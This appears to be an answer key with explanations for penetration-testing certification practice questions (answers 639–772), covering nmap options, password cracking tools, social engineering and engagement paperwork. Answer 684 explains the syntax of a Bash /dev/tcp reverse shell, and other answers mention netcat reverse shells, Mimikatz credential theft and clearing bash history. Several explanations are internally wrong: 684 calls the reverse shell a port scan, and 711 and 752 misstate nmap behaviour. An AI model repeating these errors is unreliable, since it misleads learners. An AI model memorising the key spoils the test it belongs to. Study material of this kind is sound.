A. Generally speaking, if you were to rank threat actors into tiers from least threatening to most threatening, it would look something like the following: script kiddie > hacktivist > malicious insider > organized crime > nation-state.

Answer 639

A

D. In RFID cloning, the penetration tester captures the RFID signature from a legitimate RFID device and then copies it to a fake device. This is commonly done to copy an RFID access badge.

Answer 640

A

C. The nmap 192.168.1.1 -sT command causes the nmap utility to conduct a TCP connect scan of the specified target system.

Answer 641

A

A. This output was created by John the Ripper. This credential testing tool is a brute-force password cracking utility. In this example, the root user’s password (toor) has been discovered.

Answer 642

A

D. Open source intelligence (OSINT) tools and techniques are those that go through publicly available information for organizational and technical details that might prove useful during the penetration test. OSINT is information that can be gathered easily. OSINT is often used to determine the organization’s footprint, which includes a listing of all of the systems, networks, and other technology that an organization has.

Answer 643

A

D. A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions. The MSA defines the terms that the organizations will use for any future work. NDAs are legal documents that enforce the confidential relationship between two parties. NDAs outline the parties involved, what information should be considered confidential, how long the agreement lasts, when/how disclosure is acceptable, and how confidential information should be handled. The tester’s detailed invoice to the client is just an invoice and is not a legal document.

Answer 644

A

B. Requiring a user to supply a password (something you know) plus a security token generator (something you have) constitutes multifactor authentication.

Answer 645

A

B. When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the NIST 800-115 methodology.

Answer 646

A

C and D. The programmer should be sure to include routines that tell the application what to do should it encounter an error condition. For example, many buffer overflow attacks exploit applications that don’t know how to respond when they receive more information than they were expecting. Likewise, all applications should have their code digitally signed. This will expose any unauthorized modifications made to the code.

Answer 647

A

D. In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

Answer 648

A

D. Each of the open source research sources listed in this question may contain information that you could use to find known vulnerabilities in an older version of the IIS web server software.

Answer 649

A

C. The “Minimum password age” Group Policy setting determines how long a user must keep the same password before being allowed to change it to a new one. Until that time period has elapsed, the user is forced to keep the same password. This prevents users from making constant changes to their password in an attempt to circumvent the “Enforce password history policy” setting.

Answer 650

A

B. A black box test is designed to simulate an external attack. The penetration testers should have the same perspective that a typical external attacker would have. Therefore, they should be located in a similar manner, that is, in any external location.

Answer 651

A

D and E. You could use either Kismet or WiFite to try to break the target organization’s wireless network. You could also use Aircrack-ng to accomplish this.

Answer 652

A

C. If a tester has access to a Windows workstation or server, then they can use PowerSploit, which provides the toolkit needed to maintain persistence and to perform further reconnaissance. The testing will want to exploit the HKEY_CURRENT_USER registry hive. The HKEY_CURRENT_USER hive is meant to be available only to the currently logged on user. So, when a different Windows user logs onto the system, a different copy of the HKEY_CURRENT_USER registry hive is loaded. The HKEY_CURRENT_USER registry hive is saved locally as the file NTUSER.DAT or USER.DAT when a user logs off. This registry hive can be opened in Notepad, and the encrypted login ID and password can be easily located. If the user has a roaming profile, then the NTUSER .DAT file will be saved on every workstation the user logged onto.

Answer 653

A

C. Because you are scanning only web servers, you can probably constrain the vulnerability scan to just those ports and protocols commonly used by web servers. Performing a thorough scan of all ports and protocols would take considerably longer.

Answer 654

A

B. APK Studio is a tool that you can use to reverse engineer an APK executable and analyze it for vulnerabilities.

Answer 655

A

D. The default port used by the TFTP service is 69. TFTP provides a quick and easy way to transfer files between hosts over a network connection. Unlike FTP, TFTP uses the connectionless UDP Transport Layer protocol instead of TCP. The lack of acknowledgments allows a TFTP server to transfer files faster than an FTP server. However, TFTP is an insecure protocol. All information transmitted between the FTP server and client is sent unencrypted. In addition, TFTP doesn’t provide a means for authenticating connections. Therefore, anyone can connect to the service and transfer files without providing authentication credentials.

Answer 656

A

B. In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 657

A

D. Using reg add adds a new subkey or entry into the registry. The syntax is as follows: reg add /v /t /d
- KeyName specifies the full path of the subkey or entry to be added.
- /v specifies the name of the registry entry to be added under the specified subkey.
- /t specifies the type for the registry entry.
- /d specifies the data for the new registry entry.
- Penetration testers often focus on using the easiest attack vector to achieve their objectives. One common attack method is a tool called Mimikatz. It can steal cleartext credentials from the memory of compromised Windows systems. When the WDigest Authentication protocol is enabled, plaintext passwords are stored in the Local Security Authority Subsystem Service (LSASS), exposing them to theft. WDigest is disabled by default in Windows 10.

Answer 658

A

B. The bash history keeps a record of all commands executed by a tester on the Linux command line. This allows the tester to easily run previously executed commands by using the up and down arrow keys to scroll through the command history file. The main reason for removing command-line history from the Linux terminal is to prevent another user from using the tester’s previous commands. To delete or clear all the entries from bash history, use the history command with the -c option: $ history -c.

Answer 659

A

A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Answer 660

A

D. Many wireless devices use a Wi-Fi Protected Setup (WPS) system to make connecting to the wireless network easier. However, most WPS implementations have a key weakness in that they use a simple eight-digit pin for authenticating wireless devices. Because of its short length, the pin can be cracked quite quickly, allowing a penetration tester to easily connect to a target wireless network.

Answer 661

A

C. Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back-ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

Answer 662

A

C. Notice that this device is running Windows Server 2012 and that it has port 53 open, which is the default port for a DNS server. It is reasonable to infer, therefore, that this server is a domain controller. The Active Directory role on a Windows server requires the DNS role. While the DNS role could be located on a different member server, the Active Directory is almost always installed on the same server as the DNS role.

Answer 663

A

B and C. The LLMNR protocol has many security vulnerabilities that can be exploited in a penetration test. For example, it lacks security controls such as authentication. Because of this, a malicious host on the network can advertise itself as any host it wants to.

Answer 664

A

D. Red team assessments are usually more targeted than normal penetration tests. Red teams attempt to act like an attacker by targeting sensitive data or systems with the goal of acquiring data and access. Red team assessments are not intended to provide details of all the security flaws that a target has. Red teams can be useful as a security exercise to train incident responders or to help validate security designs and practices.

Answer 665

A

A. Censys is a web-based tool that probes a given IP address. It is a search engine that helps penetration testers discover, monitor, and analyze devices that are accessible from the Internet. Censys lets researchers find specific hosts and create summative reports on how devices, web sites, certificates, and ciphers used are deployed.

Answer 666

A

B. In this scenario, a command was entered, and the attacker was attempting to gain access to the password file within the /etc directory. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via vulnerable applications. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

Answer 667

A

B and D. In this example, the device is running a web server on ports 80 and 443. Ports 515, 631, and 9100 are all used to provide network printing.

Answer 668

A

B. The #!/bin/bash element must be included at the beginning of every Bash shell script.

Answer 669

A

A. The CERT database contains information about recent security updates released by software and hardware vendors and a description of the vulnerabilities they are intended to address.

Answer 670

A

C. The Common Weakness and Enumeration (CWE) database is a community-developed resource that can be accessed at http://cwe.mitre.org. The CWE database contains a list of publicly known cybersecurity vulnerabilities associated with software in general instead of a specific product.

Answer 671

A

A. This is an example of a credential brute-forcing attack. In a true brute-force attack, all possible letter, number, and special character combinations would be tried one after another until the right one is found. However, by creating a list of likely passwords based on the user’s personal interests, the probability of success is greatly increased.

Answer 672

A

D. This is an example of a replay attack. The tester captures valid handshake data from the wireless network and they replays it later to authenticate his laptop to the wireless network.

Answer 673

A

C and D. The PCI-DSS standard requires that organizations that handle credit card processing conduct both internal and external penetration tests at least once per year. They can perform them more frequently, if desired, but they are not required to. These organizations must also conduct penetration testing after they make a significant change to the network infrastructure.

Answer 674

A

B. Most people will respond to a request to act if they are made to fear the consequences of failing to act. This is one of the most basic human motivations.

Answer 675

A

A and C. Either the –p http,https option or the –p 80,443 option can be used with nmap to scan a host for a web server service.

Answer 676

A

D. When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

Answer 677

A

B. The best defense a system administrator has against kernel exploits is to keep their operating systems updated with the latest patches from the vendor. The Common Vulnerabilities and Exposures (CVE) database contains vulnerability information for known Windows, Mac OS, Linux, UNIX, Android, and iOS operating system kernels.

Answer 678

A

A and D. While SSHv1 uses encrypted data transmissions, it is not considered to be as secure as SSHv2. However, many older Linux or UNIX systems may still be configured to use SSHv1. Likewise, TLS 1.2 is considered to be more secure than SSL 2.0.

Answer 679

A

A. With badge cloning, the tester can clone the badge of a staff member to gain entry into the facility. One of the most common techniques is to clone radio-frequency identification (RFID) tags. Given this scenario of trying to obtain access both during business hours and after hours, badge cloning is the best option.

Answer 680

A

C. People are naturally motivated by a respect for authority. When they believe someone in authority wants them to do something, they will frequently comply, especially if the request is coupled with a sense of urgency.

Answer 681

A

A. The netcat utility could be used to set up a reverse shell exploit that allows the tester to remotely control the compromised system.

Answer 682

A

B. In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

Answer 683

A

A. Most automatically locking door systems have some type of emergency fail open mechanism. The idea behind this is that if there is an emergency of some sort, such as a fire, then the doors must automatically unlock to prevent people from being trapped inside or preventing emergency personnel from entering. If you can figure out what fail open mechanism is used, you may be able to manually trigger it to open a locked door.

Answer 684

A

A. In the Bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed.
- Here’s a breakdown of the code:
- /bin/bash -i: Invokes an interactive Bash shell.
- > &/dev/tcp//: Pipes that shell to the tester.
- 0&1: Takes standard input and connects it to standard output. It does the same with standard error (2>).

Answer 685

A

B. A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Answer 686

A

D. The nmap 192.168.1.1-254 –p 23 command causes the nmap utility to scan the specified range of IP addresses for hosts with Telnet port 23 open.

Answer 687

A

C. If the nmap command is run without specifying a timing option, then the –T3 option is used by default. This tells nmap to scan in normal mode.

Answer 688

A

C. Cybersecurity professionals use the well-known CIA triad model to describe the goals of information security. The letter A in CIA stands for availability, which ensures that information remains available for authorized access.

Answer 689

A

B. Chmod is a command and system call that is used to change the access permissions of file system objects (files and directories). Chmod 4111 (chmod a+rwx,u-rw,g-rw, o-rw,ug+s,+t,g-s,-t) sets permissions so that (U)ser / owner can’t read, can’t write, and can execute. (G)roup can’t read, can’t write and can execute. (O)thers can’t read, can’t write, and can execute. sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. In this scenario. the command chmod 4111 /usr/bin/sudo will misconfigure sudo.

Answer 690

A

B. A compliance-based assessment is required in this scenario. This is a risk-based assessment that ensures policies or regulations are being followed appropriately. Most likely, the credit card companies will provide the organization with a checklist that the penetration tester will use to conduct the assessment. A goal-based assessment will specify a goal to be met by the test. A supply chain assessment involves testing an organization’s vendors. A red team assessment is usually conducted by internal testers to ensure an organization’s IT staff (the blue team) can adequately defend the network.

Answer 691

A

C. In this scenario, a black box penetration test is being run. By definition, the tester is located somewhere outside the target’s network. As such, she has to compromise an internal host first. Once done, she can pivot and use it to scan other internal hosts.

Answer 692

A

C. Because the hosts to be scanned do not have contiguous IP addresses, you must specify each host individually. In this case, the nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU command causes the nmap utility to conduct a UDP port scan of each specified system.

Answer 693

A

C and D. At a minimum, you need a tension wrench and a lock pick tool to pick a lock. The tension wrench is used to apply rotational pressure to the lock (in the unlock direction). The lock pick tool is used to release each of the pins within the lock.

Answer 694

A

B. In this scenario, the .. operators are the revealing giveaway that the attacker was attempting to conduct a directory traversal attack. This particular attack sought to break out of the web server’s root directory and access the /etc/passwd file on the server. A directory traversal attack is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

Answer 695

A

A. When creating an associative array in a Bash script, you use the following syntax: array_name[element_name] = value.

In this example, the line Target[HostName] = FS1 assigns a value of FS1 to the element named HostName within the Target array.

Answer 696

A

B. An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Answer 697

A

C. This is an example of a redirect attack because users are redirected to a fake website by the phishing emails.

Answer 698

A

D. This is an example of a Kerberos exploit. Receiving a ticket-granting ticket (TGT) allows the user to obtain additional ticket-granting service (TGS) tickets, which grant access to specific network services. Because it allows users to get other TGS tickets, the TGT is sometimes referred to as a golden ticket. Because the TGS ticket can be used only to access a specific network service, it is sometimes referred to as a silver ticket.

Answer 699

A

D. Badge cloning occurs when an attacker makes a copy of a valid access badge to enter a facility. By copying a valid badge’s RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization’s facility using the authorized employee’s credentials. Because he carefully selected a high-level employee’s badge for cloning, he may be able to access more sensitive areas of the facility.

Answer 700

A

A. The penetration tester is using fear as a motivating factor. Whether the claim is true or not, the CFO knows that such a revelation could damage his family and career. It could also expose him to prosecution. This could potentially motivate him to divulge sensitive information.

Answer 701

A

D. Fence jumping occurs when an unauthorized person simply jumps over a physical barrier designed to control access. In this scenario, the penetration tester simply steps over the turnstile that is designed to prevent unauthorized people from entering.

Answer 702

A

C. Throttling the scan to use minimal bandwidth will slow down the scanning process considerably. However, it will also make the scans less visible to the IDS/IPS devices and also allow them time to more thoroughly fingerprint network devices.

Answer 703

A

B and C. Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

Answer 704

A

A. The most important step in the penetration testing planning and scoping process is to obtain written permission from the target to perform the test. Without written permission, you are considered a hacker and are subject to federal, state, and local laws regarding computer crime (such as U.S. Code, Title 18, Chapter 47, Sections 1029 and 1030).

Answer 705

A

A. Web Services Description Language (WSDL) is an XML-based interface definition language used for describing the functionality offered by a SOAP service.

Answer 706

A

B. In a repeating attack, the penetration tester captures the target organization’s wireless network radio signal and rebroadcasts it with high gain to extend its range. In this scenario, the organization’s wireless network can now be accessed by the penetration tester from the parking lot.

Answer 707

A

D. In this scenario, your scans were detected by an intrusion protection system (IPS), and as a result, the IP address used by your laptop got put on a blacklist. Now, all the devices on the client’s network are dropping packets with the blacklisted IP address.

Answer 708

A

C. Using parameterized queries is typically considered a better defense against SQL injection attacks than sanitizing user input. With parameterized queries, prepared statements are used with bounded variables to access the SQL database.

Answer 709

A

B. SQLmap can be used to brute-force crack the password for an SQL database.

Answer 710

A

D. During a penetration test, a tester may want to configure their scans to run as stealth scans, which go to great lengths to avoid using tests that might attract attention. Service disruptions, error messages, and log entries caused by scans may attract attention from the cybersecurity team that causes them to adjust defenses in a manner that obstructs the penetration test. Using stealth scans better approximates the activity of a skilled attacker, resulting in a more realistic penetration test.

Answer 711

A

A. The nmap 192.168.1.10-13 -sA command causes the nmap utility to conduct a TCP ACK scan of the target systems with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13.

Answer 712

A

C. The Common Vulnerabilities and Exposures (CVE) database is a community-developed resource that can be accessed at http://cve.mitre.org. The CVE database contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor anywhere in the world discovers a vulnerability with their product, they add an entry to the CVE database. The goal is to make a common resource that everyone can use, instead of each individual vendor maintaining their own database containing just vulnerabilities associated with their products.

Answer 713

A

A. The Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute and attack networks.

Answer 714

A

A. Because the server room is protected by a relatively unsophisticated locking mechanism, the penetration tester could pick the lock to gain access, assuming he has the necessary lock-picking skills. Note that this would have to be done in an area without surveillance or foot traffic as it may take some time to complete.

Answer 715

A

C. A web-enabled television set is an example of a nontraditional system. These devices are considered fragile because they are difficult to manage in the traditional sense. and they are probably updated on an infrequent basis by the vendor. They may also have not been subjected to extensive security testing by the vendor.

Answer 716

A

C. The programmer in this scenario has used hidden elements in the HTML code. This is an unsecure coding practice that can result in sensitive information being stored in the user’s browser (the DOM).

Answer 717

A

B. Most likely, the client has implemented a network access control (NAC) system. Your laptop didn’t meet the criteria required by NAC to connect to the secure network, so it was quarantined on an isolated remediation network where it can access a remediation server (the other host on the network) to come into compliance.

Answer 718

A

A. One option you could try in this scenario is to decompile the application’s executable. This process will reveal the application’s assembly-level code that you can analyze for weaknesses.

Answer 719

A

A and E. When documenting problem handling and resolution in a rules of engagement document, you should clearly define escalation procedures on both sides of the agreement to help minimize downtime for the target organization. You should also include verbiage that requires the client to acknowledge that penetration testing carries inherent risks. A timeline for the engagement, along with scoping information, is also included in the ROE, just not in the problem resolution section.

Answer 720

A

B. This is an example of ARP spoofing. In this exploit, the tester sends a fake ARP broadcast on the network segment that maps the IP address of a legitimate network host to her MAC address. As a result, all traffic addressed to the legitimate host gets redirected to the tester’s system.

Answer 721

A

D. Two-factor authentication (2FA) requires users to supply factors from two different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), and a facial recognition scan (something you are) constitutes 2FA authentication.

Answer 722

A

A. Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers.

Answer 723

A

A and D. Because the test will include both the target organization’s network as well as service provided by the third-party SaaS provider, you must obtain written permission from both entities before performing the penetration test. Failure to obtain either one could expose you to prosecution and/or litigation.

Answer 724

A

A. The -Pn option tells nmap to scan a host (or an entire subnet) without actually discovering hosts. This type of scan should be avoided during a penetration test because it takes a long time; each port on each IP address in the range is scanned, regardless of whether the IP address is valid. Because of this, it also creates a tremendous amount of traffic that may be detected by an IDS or IPS tool.

Answer 725

A

C. This is an example of threat modeling. Using threat modeling, you determine the type of threat you want to emulate during the penetration test. Then you use the same tools, techniques, and approaches that type of threat would typically use.

Answer 726

A

D. The issue here is that the network uses a switch instead of a hub. The switch learns the MAC addresses of each network interface connected to each switch port. It only transmits frames to the specific port to which the destination network interface is attached. Because of this, your laptop never sees frames transmitted to other hosts on the network. While you could theoretically swap out the network switch for a hub, your client would probably not allow you to do this. The best option would be to connect the laptop to a mirror port on the switch. The mirror port contains copies of frames transmitted to all other switch ports. This allows your laptop to see frames addressed to other hosts. Before you do this, however, you need to make sure it is allowed under the rules of engagement for the test.

Answer 727

A

D. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, shredding the documents will make it much harder to recover the data from the reports.

Answer 728

A

A. Stealth scans currently aren’t considered as stealthy as they used to be. Most modern IDS/IPS devices can detect the unusually high frequency of RST packets on the network created during a stealth scan and take the appropriate action. For example, an IDS can generate an alert. An IPS can generate an alert and also block traffic from the scanning host.

Answer 729

A

D. Race conditions occur when the security of a code segment depends upon the sequence of events occurring within the system. The time-of-check-to-time-of-use (TOCTTOU) issue is a race condition that occurs when a program checks access permissions too far in advance of a resource request.

Answer 730

A

C. Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

Answer 731

A

B. Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page. In this scenario, the attacker is attempting to manipulate an HTML iframe with JavaScript code using a web browser.

Answer 732

A

A. Because this is a black box assessment, the testers should have no prior knowledge of the environment to be tested nor should they have special access to it. In essence, they should attack the client from the same perspective as a real attacker would. It is quite appropriate to pause testing during peak times to avoid disrupting their critical business operations. It’s also appropriate to communicate with the client only after the test is complete, especially on a black box assessment.

Answer 733

A

C. The –oA option causes nmap to write the output from the scan to a normal text file, in an XML-formatted text file, and in a greppable text file all at once. You must specify a base filename with this option. A different extension will be added to each of the files generated using this base filename. The normal file will have an .nmap extension, the greppable file will have a .gnmap extension, and the XML file will have an .xml extension.

Answer 734

A

B. Before two organizations merge, it is common for penetration tests to be conducted to identify any security vulnerabilities that need to be addressed before their networks are connected. An objective-based assessment is designed to test whether information can remain secure. A compliance-based test is done to ensure that an organization remains in compliance with governmental regulations or corporate policies. A supply chain test involves testing an organization’s vendors.

Answer 735

A

A. The time windows when you can run vulnerability scans most effectively are heavily influenced by regulatory requirements, peak traffic times, and hardware constraints. The internal IT staff, on the other hand, will most likely not be involved with running vulnerability scans during a penetration test.

Answer 736

A

D. An SNMP brute-force attack attacks an IP address with SNMP queries to determine the SNMP read-only and read-write community strings (or passwords). It does this by trying every possible password. The master information base (MIB) database that is created by SNMP contains important information on every device on the network. If a tester can crack the password on SNMP, they may be able to control each networked device. This would allow changes to configurations to taking devices offline.

Answer 737

A

D. The rules of engagement (ROE) have been defined as needed in this scenario. ROE key elements include the following:
- The timeline for the engagement and when testing can be conducted.
- What locations, systems, applications, or other targets are included/excluded. Also, any special technical constraints should be addressed in the ROE.
- Data handling requirements for any information gathered during the penetration testing.
- What behaviors to expect. Any defensive behaviors such as shunning, blacklisting, or other active defenses may limit the value of a penetration test.
- What resources will be committed to the testing.
- Any legal concerns that should be addressed, including a summary of any regulatory concerns affecting the client organization, the penetration testing team, any remote locations, and any service providers who will be in scope.
- When and how communications will occur.
- Who to contact in case of particular events, such as evidence of compromises, accidental breach of ROE, critical vulnerabilities that have been discovered, or other events that merit immediate attention.
- Who is allowed to contact the penetration testing team.

Answer 738

A

A. The Aircrack-ng utility can be used to discover wireless networks in range and then crack their encryption. This process is very fast for old WEP networks, harder but doable for WPA networks, and quite challenging for WPA2 networks.

Answer 739

A

A. The nmap utility is a widely used scanner. You can use it to scan a single host, such as the web server mentioned in this scenario, or even an entire network. To be a successful penetration tester, you should be familiar with the various ways in which nmap can be employed to discover information.

Answer 740

A

D. When referencing a value from an array, Python uses the following syntax: (array_name[position]). In this example, the print command is being told to print the second value of the array named PrimeNumArray.

Answer 741

A

A. Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute and attack networks.

Answer 742

A

A and E. While commenting an application’s source code is a best practice for programmers, it can also create security vulnerability because it provides an attacker (or penetration tester) who views the source code with extensive information about how the application works. Likewise, providing overly verbose error messages may be a best practice while programming the application, but leaving them in the released application can provide an attacker with valuable information.

Answer 743

A

A and E. In this scenario, the scope of this engagement is limited to the internal network only. Microsoft Office 365, Google Docs, and Microsoft Azure are all cloud-based services hosted by third parties and are therefore considered out-of-scope. The Active Directory users and the password policies that are defined within Group Policy would be considered in scope.

Answer 744

A

A. A TCP SYN flood (also known as a SYN flood) is a form of denial of service (DoS) attack in which a tester sends a succession of SYN requests to the target’s system in an attempt to consume enough server resources to make the system unresponsive to genuine traffic. This exploits part of the normal TCP three-way handshake and consumes resources on the targeted server and renders it unresponsive.

Answer 745

A

B. This output was created by the Medusa utility. Medusa is a brute-force password cracking tool that sends one password after another to a given user account (administrator, in this case) in hopes of finding the right one.

Answer 746

A

B. A hacktivist’s attacks are usually politically motivated, instead of financially motivated. A malicious insider is usually motivated by either revenge or financial gain. An organized crime actor is most likely motivated by financial gain. A script kiddie may have a variety of motivations, such as notoriety.

Answer 747

A

A and B. The scope of this engagement in this scenario is limited to the internal network infrastructure. Microsoft Office 365, Google Docs, and Microsoft Azure are all cloud-based services hosted by third parties and are therefore considered out of scope.

Answer 748

A

C. A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. Compliance-based assessments are designed to test compliance with specific laws. In a black box test, the testers are not provided with access to or information about the target environment. A white box test is performed with full knowledge of the underlying network.

Answer 749

A

D. An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in layman’s terms. A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 750

A

A and B. These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, you would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

Answer 751

A

C. Windows Management Instrumentation is an infrastructure provided by Microsoft for centrally managing Windows systems over a network connection.

Answer 752

A

B. Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap be installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is from 1–65,535. In this scenario, since you did not specify exactly how many ports to scan, it will scan the default of 1,000.

Answer 753

A

C and D. Open-source intelligence (OSINT) is any information that is publicly available and can be passively gathered. Because it is passively gathered, you can’t use methods that actively engage the target organization to gather OSINT. For example, running a vulnerability scan is an active method, as is penetrating the organization’s facility or wheedling information out of a disgruntled employee. On the other hand, gathering information from the organization’s DNS registrar or reading job postings on the organization’s website are examples of passively gathering public information.

Answer 754

A

A. By masquerading as an upper-level manager, the penetration tester in this example utilized an appeal to authority to coerce the employee into divulging sensitive information.

Answer 755

A

B. Cookie manipulation is a client-side security misconfiguration that allows a script running within a browser to write data to a client-side cookie.

Answer 756

A

A. After a penetration test, it is critical that you undo everything you have done. For example, it is critical that you uninstall any tools or utilities you used to conduct exploits during the test.

Answer 757

A

C and E. File inclusion is an exploit that allows a tester to upload a file (usually containing malicious code) into a web application. The file could be local, or it could be located on a remote website. This is really a form of injection attack and just as with any injection attack, input validation on the part of the web application developer is the key to preventing it.

Answer 758

A

D. The if/then/else structure is considered to be a flow control structure because it branches the script in one of several directions based on how a specified condition evaluates.

Answer 759

A

B. A nondisclosure agreement (NDA) is a legal contract that defines what confidential information can be shared and what cannot be shared. In most penetration testing agreements, the NDA specifies that the tester may not reveal the results of the test to anyone other than the client itself. A SOW is a formal document that defines the scope of the penetration test. An MSA defines terms that will govern future agreements. A purchase order is a binding agreement to make a purchase from a vendor.

Answer 760

A

E. When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section, including when you think the client should conduct follow-up penetration tests.

Answer 761

A

B. A noncredentialed vulnerability scan is performed without authenticating to the network. Because of this, a noncredentialed scan most closely approximates the perspective an external hacker.

Answer 762

A

B and E. Knowing the company policies and their tolerance to impact are two of the most important items needed to know when planning for an engagement. The others are important, but this scenario is asking for the two most important. Cybersecurity professionals widely agree that vulnerability management is a critical component of any information security program, and for this reason, many organizations mandate vulnerability scanning in corporate policy, even if that is not a regulatory requirement. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.

Answer 763

A

D. An SNMP brute-force attack attacks an IP address with SNMP queries to determine the SNMP read-only and read-write community strings (or passwords). It does this by trying every possible password. The master information base (MIB) database that is created by SNMP contains important information on every device on the network. If a tester can crack the password on SNMP, they may be able to control each networked device. This would allow changes to configurations to taking devices offline.

Answer 764

A

A. The FTP protocol does not encrypt data transfers between systems. This means authentication information as well as the data itself are exposed during transmission over the network. To remedy this, you should recommend that the client switch to FTPS instead of FTP. The FTPS protocol uses SSL or TLS to encrypt an FTP session since they encrypt data.

Answer 765

A

A. This is an example of a SQL injection attack. Instead of entering a password into the Password field, the tester inserts a SQL statement. If the web application in this example was poorly written, then it is possible that it would pull usernames and passwords for every user in the hypothetical database. The UNION SELECT statement is used to combine two unrelated SELECT queries to retrieve data from different database tables. A well-written application will use input validation to prevent SQL statements from being submitted within a user form. The same principles apply to HTML injection, command injection, and code injection attacks.

Answer 766

A

A. The Actions on Objectives stage of the attack also may include the theft of sensitive information, the unauthorized use of computing resources to engage in denial-of-service attacks, or the unauthorized modification/deletion of information. The attacker carries out their original intentions to violate the confidentiality, integrity, and/or availability of information or systems during the Actions on Objectives stage of the Cyber Kill Chain.

Answer 767

A

A. The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker with a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.

Answer 768

A

A. In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. This is done by figuring out whether the likelihood is Low, Medium, or High and then doing the same for impact. The 0 to 9 scale is split into three parts: 0 to <3 is Low, 3 to <6 is Medium, and 6 to 9 is High.

Answer 769

A

C. In this scenario, the client has asked you to go beyond the agreed-upon test scope. This is an example of scope creep, and it is a common occurrence in IT contracting. In this scenario, you could respond in one of two ways. First, you could simply reject the request as being out-of-scope. Alternatively, you could ask the client to include the email servers in an addendum to the existing contract for an additional fee.

Answer 770

A

A. Running unattended installations over the network using the Preboot Execution Environment (PXE) could potentially result in authentication credentials being transferred as clear text. During the unattended install, a special file called the answers file is used to automate the installation process. If the answers file contains user account information to be created on the system during the install, that information is transferred as clear text.

Answer 771

A

B. Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This occurs with the authorized person’s knowledge and/or consent. In this example, the authorized employee held the door open for the penetration tester.

Answer 772

A

